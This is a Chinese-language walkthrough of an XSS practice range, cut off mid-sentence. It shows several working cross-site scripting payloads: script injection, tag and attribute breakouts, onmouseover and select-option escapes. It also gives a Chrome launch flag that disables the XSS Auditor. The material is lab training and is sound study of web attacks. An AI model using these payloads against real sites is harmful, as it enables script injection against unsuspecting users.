实验环境介绍
地址:https://xss-quiz.int21h.jp/
该网址是一个可用于XSS攻击的靶场
探测XSS过程
- 1.构造一个不会被识别为恶意代码的字符串提交到页面中
- 2.使用浏览器审查工具进行代码审查,寻找构造的字符串是否在页面中显示
闭合文本标签利用XSS
简单的payload
<script>alert(document.domain);</script>
闭合标签的payload
"</b><script>alert(document.domain);</script>
配置Chrome关闭XSS-Auditor
https://xss-quiz.int21h.jp/ 利用XSS过程中会出现下图情况。配置Chrome --args --disable-xss-auditor
在桌面新建一个快捷方式
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --args --disable-xss-auditor
属性中的XSS发现
技巧:ctrl+f 全局搜索输入的内容
闭合引号,尖括号,引入script脚本
payload
123"><script>alert(document.domain);</script>
onmouseover 鼠标悬停弹出
" onmouseover= " alert(document.domain)>
select元素可创建单选或多选菜单
<select name="p2">
<option>Japan</option>
<option>Germany</option>
<option>USA</option>
<option>United Kingdom</option>
</select>
在select下拉框中输入,闭合标签
Japan</option><script>alert(document.domain);</script>
HTML表单隐藏参数介绍
隐藏域是用来收集或发送信息的不可见元素,对于网页的访